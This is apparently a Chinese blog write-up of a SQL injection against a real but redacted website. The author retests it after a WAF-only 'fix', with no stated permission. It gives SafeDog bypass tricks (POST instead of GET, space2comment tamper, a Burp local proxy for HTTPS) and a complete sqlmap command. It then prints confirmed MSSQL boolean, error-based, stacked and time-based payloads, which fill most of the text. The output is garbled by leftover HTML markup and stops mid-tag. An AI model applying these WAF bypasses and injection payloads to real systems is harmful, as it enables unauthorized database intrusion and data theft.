记一次SQL注入
目标地址:https://www.xxxx.com/
之前补天提交过这个注入 后来貌似”修复了”(实际就是装了安全狗和过滤了一些关键字)
不过今天试了下 还是可以注入
可以看到已经有安全狗拦截get方式的注入字符
目标站是伪静态重写了url 改一下提交规则即可
改成post提交(默认安全狗只拦截get方式)
可以接受post参数 经过测试 拦截了一些空格和敏感字符
直接上sqlmap跑 注意线程和伪造http头
因为目标站是https 我加了--force-ssl参数 指定为https,但是显示https 连接出错。
因为sqlmap没办法忽略https证书 所以有两个解决方法
-
通过本地代理端口进行访问
-
通过搭建web,访问代理文件进行注入
第一种简单又不涉及代码 直接burpsuite代理本地8080端口,然后sqlmap通过8080端口进行访问注入即可(当然其他本地映射charles也可以)
-u https://www.xxx.com/news_show.asp --data=id=3395 --safe-url=https://www.xxxx.com/news_show.asp?/3395.html --safe-freq=2 --tamper space2comment.py --force-ssl --proxy http://127.0.0.1:8080 --random-agent -v 3
结果:
Parameter: id (POST)</span><span class="typ">Type</span><span class="pun">:</span><span class="pln"> </span><span class="kwd">boolean</span></span><span class="pun">-</span><span style="color: #000000;"><span class="pln">based blind </span><span class="typ">Title</span><span class="pun">:</span><span class="pln"> AND </span><span class="kwd">boolean</span></span><span class="pun">-</span><span class="pln">based blind </span><span class="pun">-</span><span style="color: #000000;"><span class="pln"> WHERE </span><span class="kwd">or</span><span class="pln"> HAVING clause </span><span class="typ">Payload</span><span class="pun">:</span><span class="pln"> id</span></span><span class="pun">=</span><span style="color: #800080;"><span class="lit">3395</span></span><span class="pln"> AND </span><span style="color: #800080;"><span class="lit">1967</span></span><span class="pun">=</span><span style="color: #800080;"><span class="lit">1967</span></span><span style="color: #000000;"><span class="pln"> </span><span class="typ">Vector</span><span class="pun">:</span><span class="pln"> AND </span><span class="pun">[</span><span class="pln">INFERENCE</span><span class="pun">]</span><span class="pln"> </span><span class="typ">Type</span><span class="pun">:</span><span class="pln"> error</span></span><span class="pun">-</span><span style="color: #000000;"><span class="pln">based </span><span class="typ">Title</span><span class="pun">:</span><span class="pln"> </span><span class="typ">Microsoft</span><span class="pln"> SQL </span><span class="typ">Server</span></span><span class="pun">/</span><span class="typ">Sybase</span><span class="pln"> AND error</span><span class="pun">-</span><span class="pln">based </span><span class="pun">-</span><span style="color: #000000;"><span class="pln"> WHERE </span><span class="kwd">or</span><span class="pln"> HAVING clause </span><span class="pun">(</span><span class="pln">IN</span><span class="pun">)</span><span class="pln"> </span><span class="typ">Payload</span><span class="pun">:</span><span class="pln"> id</span></span><span class="pun">=</span><span style="color: #800080;"><span class="lit">3395</span></span><span class="pln"> AND </span><span style="color: #800080;"><span class="lit">8669</span></span><span class="pln"> IN </span><span class="pun">(</span><span class="pln">SELECT </span><span class="pun">(</span><span class="pln">CHAR</span><span class="pun">(</span><span style="color: #800080;"><span class="lit">113</span></span><span class="pun">)+</span><span class="pln">CHAR</span><span class="pun">(</span><span style="color: #800080;"><span class="lit">118</span></span><span class="pun">)+</span><span class="pln">CHAR</span><span class="pun">(</span><span style="color: #800080;"><span class="lit">106</span></span><span class="pun">)+</span><span class="pln">CHAR</span><span class="pun">(</span><span style="color: #800080;"><span class="lit">98</span></span><span class="pun">)+</span><span class="pln">CHAR</span><span class="pun">(</span><span style="color: #800080;"><span class="lit">113</span></span><span class="pun">)+(</span><span class="pln">SELECT </span><span class="pun">(</span><span class="pln">CASE WHEN </span><span class="pun">(</span><span style="color: #800080;"><span class="lit">8669</span></span><span class="pun">=</span><span style="color: #800080;"><span class="lit">8669</span></span><span class="pun">)</span><span class="pln"> THEN CHAR</span><span class="pun">(</span><span style="color: #800080;"><span class="lit">49</span></span><span class="pun">)</span><span class="pln"> ELSE CHAR</span><span class="pun">(</span><span style="color: #800080;"><span class="lit">48</span></span><span class="pun">)</span><span class="pln"> </span><span class="kwd">END</span><span class="pun">))+</span><span class="pln">CHAR</span><span class="pun">(</span><span style="color: #800080;"><span class="lit">113</span></span><span class="pun">)+</span><span class="pln">CHAR</span><span class="pun">(</span><span style="color: #800080;"><span class="lit">112</span></span><span class="pun">)+</span><span class="pln">CHAR</span><span class="pun">(</span><span style="color: #800080;"><span class="lit">107</span></span><span class="pun">)+</span><span class="pln">CHAR</span><span class="pun">(</span><span style="color: #800080;"><span class="lit">118</span></span><span class="pun">)+</span><span class="pln">CHAR</span><span class="pun">(</span><span style="color: #800080;"><span class="lit">113</span></span><span style="color: #000000;"><span class="pun">)))</span><span class="pln"> </span><span class="typ">Vector</span><span class="pun">:</span><span class="pln"> AND </span><span class="pun">[</span><span class="pln">RANDNUM</span><span class="pun">]</span><span class="pln"> IN </span><span class="pun">(</span><span class="pln">SELECT </span><span class="pun">(</span></span><span style="color: #800000;"><span class="str">'</span></span><span style="color: #800000;"><span class="str">[DELIMITER_START]</span></span><span style="color: #800000;"><span class="str">'</span></span><span class="pun">+([</span><span class="pln">QUERY</span><span class="pun">])+</span><span style="color: #800000;"><span class="str">'</span></span><span style="color: #800000;"><span class="str">[DELIMITER_STOP]</span></span><span style="color: #800000;"><span class="str">'</span></span><span style="color: #000000;"><span class="pun">))</span><span class="pln"> </span><span class="typ">Type</span><span class="pun">:</span><span class="pln"> </span><span class="kwd">inline</span><span class="pln"> query </span><span class="typ">Title</span><span class="pun">:</span><span class="pln"> </span><span class="typ">Microsoft</span><span class="pln"> SQL </span><span class="typ">Server</span></span><span class="pun">/</span><span style="color: #000000;"><span class="typ">Sybase</span><span class="pln"> </span><span class="kwd">inline</span><span class="pln"> queries </span><span class="typ">Payload</span><span class="pun">:</span><span class="pln"> id</span></span><span class="pun">=(</span><span class="pln">SELECT CHAR</span><span class="pun">(</span><span style="color: #800080;"><span class="lit">113</span></span><span class="pun">)+</span><span class="pln">CHAR</span><span class="pun">(</span><span style="color: #800080;"><span class="lit">118</span></span><span class="pun">)+</span><span class="pln">CHAR</span><span class="pun">(</span><span style="color: #800080;"><span class="lit">106</span></span><span class="pun">)+</span><span class="pln">CHAR</span><span class="pun">(</span><span style="color: #800080;"><span class="lit">98</span></span><span class="pun">)+</span><span class="pln">CHAR</span><span class="pun">(</span><span style="color: #800080;"><span class="lit">113</span></span><span class="pun">)+(</span><span class="pln">SELECT </span><span class="pun">(</span><span class="pln">CASE WHEN </span><span class="pun">(</span><span style="color: #800080;"><span class="lit">6806</span></span><span class="pun">=</span><span style="color: #800080;"><span class="lit">6806</span></span><span class="pun">)</span><span class="pln"> THEN CHAR</span><span class="pun">(</span><span style="color: #800080;"><span class="lit">49</span></span><span class="pun">)</span><span class="pln"> ELSE CHAR</span><span class="pun">(</span><span style="color: #800080;"><span class="lit">48</span></span><span class="pun">)</span><span class="pln"> </span><span class="kwd">END</span><span class="pun">))+</span><span class="pln">CHAR</span><span class="pun">(</span><span style="color: #800080;"><span class="lit">113</span></span><span class="pun">)+</span><span class="pln">CHAR</span><span class="pun">(</span><span style="color: #800080;"><span class="lit">112</span></span><span class="pun">)+</span><span class="pln">CHAR</span><span class="pun">(</span><span style="color: #800080;"><span class="lit">107</span></span><span class="pun">)+</span><span class="pln">CHAR</span><span class="pun">(</span><span style="color: #800080;"><span class="lit">118</span></span><span class="pun">)+</span><span class="pln">CHAR</span><span class="pun">(</span><span style="color: #800080;"><span class="lit">113</span></span><span style="color: #000000;"><span class="pun">))</span><span class="pln"> </span><span class="typ">Vector</span><span class="pun">:</span><span class="pln"> </span><span class="pun">(</span><span class="pln">SELECT </span></span><span style="color: #800000;"><span class="str">'</span></span><span style="color: #800000;"><span class="str">[DELIMITER_START]</span></span><span style="color: #800000;"><span class="str">'</span></span><span class="pun">+([</span><span class="pln">QUERY</span><span class="pun">])+</span><span style="color: #800000;"><span class="str">'</span></span><span style="color: #800000;"><span class="str">[DELIMITER_STOP]</span></span><span style="color: #800000;"><span class="str">'</span></span><span style="color: #000000;"><span class="pun">)</span><span class="pln"> </span><span class="typ">Type</span><span class="pun">:</span><span class="pln"> stacked queries </span><span class="typ">Title</span><span class="pun">:</span><span class="pln"> </span><span class="typ">Microsoft</span><span class="pln"> SQL </span><span class="typ">Server</span></span><span class="pun">/</span><span style="color: #000000;"><span class="typ">Sybase</span><span class="pln"> stacked queries </span><span class="pun">(</span><span class="pln">comment</span><span class="pun">)</span><span class="pln"> </span><span class="typ">Payload</span><span class="pun">:</span><span class="pln"> id</span></span><span class="pun">=</span><span style="color: #800080;"><span class="lit">3395</span></span><span class="pun">;</span><span class="pln">WAITFOR DELAY </span><span style="color: #800000;"><span class="str">'</span></span><span style="color: #800000;"><span class="str">0:0:5</span></span><span style="color: #800000;"><span class="str">'</span></span><span class="pun">--</span><span style="color: #000000;"><span class="pln"> </span><span class="typ">Vector</span><span class="pun">:</span><span class="pln"> </span><span class="pun">;</span><span class="pln">IF</span><span class="pun">([</span><span class="pln">INFERENCE</span><span class="pun">])</span><span class="pln"> WAITFOR DELAY </span></span><span style="color: #800000;"><span class="str">'</span></span><span style="color: #800000;"><span class="str">0:0:[SLEEPTIME]</span></span><span style="color: #800000;"><span class="str">'</span></span><span class="pun">--</span><span style="color: #000000;"><span class="pln"> </span><span class="typ">Type</span><span class="pun">:</span><span class="pln"> AND</span></span><span class="pun">/</span><span class="pln">OR time</span><span class="pun">-</span><span style="color: #000000;"><span class="pln">based blind </span><span class="typ">Title</span><span class="pun">:</span><span class="pln"> </span><span class="typ">Microsoft</span><span class="pln"> SQL </span><span class="typ">Server</span></span><span class="pun">/</span><span class="typ">Sybase</span><span class="pln"> time</span><span class="pun">-</span><span class="pln">based blind </span><span class="pun">(</span><span class="pln">IF </span><span class="pun">-</span><span style="color: #000000;"><span class="pln"> comment</span><span class="pun">)</span><span class="pln"> </span><span class="typ">Payload</span><span class="pun">:</span><span class="pln"> id</span></span><span class="pun">=</span><span style="color: #800080;"><span class="lit">3395</span></span><span class="pln"> WAITFOR DELAY </span><span style="color: #800000;"><span class="str">'</span></span><span style="color: #800000;"><span class="str">0:0:5</span></span><span style="color: #800000;"><span class="str">'</span></span><span class="pun">--</span><span style="color: #000000;"><span class="pln">